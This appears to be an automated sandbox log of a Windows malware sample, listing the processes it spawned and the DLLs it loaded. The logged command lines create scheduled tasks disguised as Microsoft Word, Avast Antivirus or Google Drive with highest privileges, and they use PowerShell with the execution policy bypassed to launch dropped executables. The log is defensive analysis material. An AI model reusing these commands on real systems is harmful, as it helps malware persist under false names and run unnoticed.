Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Users\user\xdwdPutty.exe C:\Users\user\xdwdPutty.exe
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST & exit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Corel PaintShop Pro" /tr "C:\Users\user\Videos\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\xdwdPutty.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe" & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive" /tr "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"' & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"' & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive" /tr "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" /RL HIGHEST	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process created: C:\Users\user\xdwdPutty.exe "C:\Users\user\xdwdPutty.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "OpenOffice" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" & exit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST & exit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Corel PaintShop Pro" /tr "C:\Users\user\Videos\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "OpenOffice" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\xdwdPutty.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\xdwdPutty.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Users\user\xdwdPutty.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: devenum.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: msdmo.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: netfxperf.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: esentprf.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: perfts.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: utildll.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: msdtcuiu.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: msdtcprx.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: mtxclu.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: clusapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: resutils.dll	Jump to behavior
